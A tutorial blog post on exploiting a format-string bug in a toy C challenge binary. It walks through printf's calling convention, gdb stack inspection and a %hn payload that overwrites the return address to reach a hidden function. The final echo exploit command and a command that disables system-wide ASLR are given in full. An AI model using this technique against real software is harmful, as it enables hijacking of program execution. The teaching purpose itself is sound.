Files

Introduction

A redditor on r/ExploitDev asked for help exploiting the following binary.

1#include <stdio.h>
2#include <stdlib.h>
3#include <unistd.h>
4
5int a = 40;
6int b = 60;
7
8void secretFunction(){
9 printf("Code redirected successfully");
10}
11
12int main(){
13 char buf[100];
14 read(0, buf, 100);
15 printf(buf);
16
17 if ( a == 115 && b == 1056){
18 exit(0);
19 }
20 return 0;
21}

For completeness, I compiled the source using the following gcc command.

gcc chal.c -o chal -no-pie -g

no-pie was my attempt at disabling ASLR, but I learned that the stack is still randomized even if the binary is compiled with no-pie. In order to truly disable stack randomization, one must either run the binary in gdb or run echo 0 | sudo tee /proc/sys/kernel/randomize_va_space. Note that the latter command applies to all new processes launched on the system and may have serious security implications. If you do want to enable randomization again, you can run echo 2 | sudo tee /proc/sys/kernel/randomize_va_space or reboot your machine. Since this is just a tutorial post, I opted for the former method of testing my exploit in gdb.

Vulnerability

On line 14, there is a read from STDIN into a buffer on the stack. On line 15, this buffer is printed to STDOUT. Unfortunately, the read is size limited, so we cannot overflow the buffer. That said, we control the entire format string passed into printf, so we can take advantage of this to read and modify stack memory. I thought the check on line 17 would have some significance, but could not find any use for it. printf is a variadic function, which means it takes a variable number of arguments. The number of arguments it takes is dependent on the format string. For example, printf("%x %x %x") expects three arguments whereas printf("pwn") expects no arguments. Since we control the format string, we can force printf to interact with arguments that the program author did not intend.

Triggering the Vulnerability

First of all, let's make sure we understand what's going on. Although it is more fun to just begin writing exploits, taking the time to validate all your assumptions and understand what is actually going on can be very worthwhile. First, I compiled a simple program in Compiler Explorer to see how printf processes its arguments.

An image depicting the assembly generated for a printf call.

We can see here that variadic functions like printf also follow the SystemV x86_64 calling ABI as other function. The format string is stored in rdi. The next five arguments are stored in rsi, rdx, rcx, r8, and r9 respectively. Any arguments after that are pushed onto the stack in the reverse order; this ensures that the arguments are popped off the stack in the intended order by the function in question.

In order to validate this, I sent the binary %x %x %x %x %x %x %x %x %x %x and compared the output with data scraped using gdb. I am using the pwndbg extension for gdb, but even without that i r will print out the values of all the registers and x/6gx $rsp will print out the top 6 values on the stack. I set a breakpoint at printf in order to collect this data.

> i r

rax            0x0                 0
rbx            0x7fffffffdef8      140737488346872
rcx            0x7ffff7ec019d      140737352827293
rdx            0x64                100
rsi            0x7fffffffdd70      140737488346480
rdi            0x7fffffffdd70      140737488346480
rbp            0x7fffffffdde0      0x7fffffffdde0
rsp            0x7fffffffdd68      0x7fffffffdd68
r8             0x0                 0
r9             0x7ffff7fcf680      140737353938560
r10            0x7ffff7ddf5f8      140737351906808
r11            0x7ffff7e1a5b0      140737352148400
r12            0x0                 0
r13            0x7fffffffdf08      140737488346888
r14            0x403e00            4210176
r15            0x7ffff7ffd020      140737354125344
rip            0x7ffff7e1a5b0      0x7ffff7e1a5b0 <__printf>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0

> x/6gx $rsp

0x7fffffffdd68:	0x0000000000401190	0x7825207825207825
0x7fffffffdd78:	0x2520782520782520	0x2078252078252078
0x7fffffffdd88:	0x00000a7825207825	0x0000000000000000

output

ffffdd70 64 f7ec019d 0 f7fcf680 25207825 20782520 78252078 25207825 0

This is what we expect to see. Note that %x displays a 32 bit integer and registers are 64 bits large on this system. As a result, the output will display the lower 32 bits of what we print from the registers and the stack. The first five output values correspond to rsi, rdx, rcx, r8, r9. The first value on the stack corresponds to the return address. The next five output values show up after the return address on the stack.

Exploit

printf has a %n parameter that will write the length of the processed format string up to the %n to an argument. For example, printf("aaaa%n bbbb", &length) would set the value of length to be 4. We can use this to modify stack memory and call secretFunction. The memory address %n writes to is passed to printf as an argument. We control a buffer on the stack, so if we can get printf to read our data on the stack and interpret it as an argument, we can force printf to write values at an address we control.

In gdb, p/x secretFunction revealed that secretFunction was located at 0x401146. Unfortunately, we need to produce a 0x401146 = 4198726 byte string to be able to overwrite the stack return address to point to secretFunction. This is a lot of bytes to write to STDOUT, so we can be a bit more clever about this. We can use %hn instead of %n to write a short (2 byte) value instead of a 4 byte integer. Using this trick, we only have to generate a string of length 0x1146 = 4422 bytes. From dumping the stack in the Triggering the Vulnerability section, we know that the return address is located at 0x7fffffffdd68.

There is one last trick that makes our exploit easier to write. We can numerically select the argument we want to use with the format string. For example, printf("%3$x", 1, 2, 3) -> 3. Using all the tricks we know of so far, we speculate that our exploit will be of the form %0<num>$x.%hn<pad><return_addr_pointer>. The first part sets up the string length to be the value we want to write, the second part does the writing, and the third ensures the data is written at an address we specify. We can experiment with this until we get the offsets right. First, I'm going to replace $hn with $16jx to be able to see what address we would be writing at. We know that num will have to be around 4422, so we will start there. For now, we can use an easy-to-identify return address location such as AAAAAAAABBBBBBBB. I added in an extra set of Bs so that we can detect any offset into the return address location. For example, if we see AAAAAABB, then we know that we need to shift everything by two bytes to operate on the address that we specify. I also added dots as delimiters so that we can easily identify the value and size of all of the components of this exploit. Now, I just used trial and error.

> %04422x.%8$16jx.AAAAAAAABBBBBBBB

0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a8bdaf10.4141414141414141.AAAAAAAABBBBBBBB

That's a lot of output, but we see that the address referred to by %8$16jx is 0xAAAAAAAA, which we control. Now, we also compute the string length of everything before where the %8$hn would have been (including the dot). This length is 4423, which is one more than the value we wanted to write. To correct this, we just need to decrease <num> by 1. For our final exploit, we need to replace %8$16jx with %8$hn. Since the latter is 2 characters smaller than the former, we add two padding dots to ensure all the offsets stay the same. Note that we need to use the echo command to send the raw address bytes to STDIN. This also means that we have to escape the $ now. Finally, need to make sure that the address is sent in little endian format. Our final exploit is as follows.

> echo -e "%04421x.%8\$hn...\x68\xdd\xff\xff\xff\x7f\x00\x00" | ./chal

0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000Segmentation fault (core dumped)

Unfortunately, we get a segmentation fault. This was somewhat confusing to me since we checked everything and made sure all the addresses matched before launching the final exploit. The ulimit -S -c unlimited command enables core dumps on Linux. As a result, a core file will be generated whenever a program crashes. gdb -c core will allow us to inspect the core dump.

A pwndbg screenshot depicting a store of 0x1146 to 0x7fffffffdd68.

If we look at where rip is, we can clearly see that the segmentation fault happened while trying to store 0x1146 at 0x7fffffffdd68. This is exactly what we wanted to happen, so why is it crashing? Looking at the STACK section, we can see that the stack is mapped to a different address. This is part of the kernel's attempt at ASLR and will take effect even if the binary is compiled as a position independent executable. Hence, I ran the exploit in gdb to ensure the stack was where we expected it to be. We could have also turned of kernel stack randomization as described in the top of the blog, but I did not want to turn it off and forget to turn it back on.

> echo -e "%04421x.%8\$hn...\x68\xdd\xff\xff\xff\x7f\x00\x00" > pwn.txt

> gdb ./chal -ex "b secretFunction" -ex "r <pwn.txt"

We can see here that secretFunction is indeed executed. Our exploit works! There are few satisfactions in life as good as watching a tweetable exploit hijack a binary. If you followed this tutorial up until now, I hope it was worth your while and you learned some cool tricks.

Pitfalls

Apart from the stack randomization, the only other catch that gave me some trouble was putting the address in the beginning of the exploit. I thought it would be smart to put the write address at the beginning of the exploit so its offset would not change as I modified the exploit. In other words, if the exploit was of the form \x68\xdd\xff\xff\x7f\x00\x00%<num>x.%8$hn, I could modify the latter part of the exploit without changing the offset to the address. However, this failed since the address contained null bytes. The printf function stopped processing the exploit as soon as it hit the null bytes and whole exploit was not processed. As a result, the address had to be moved to the end.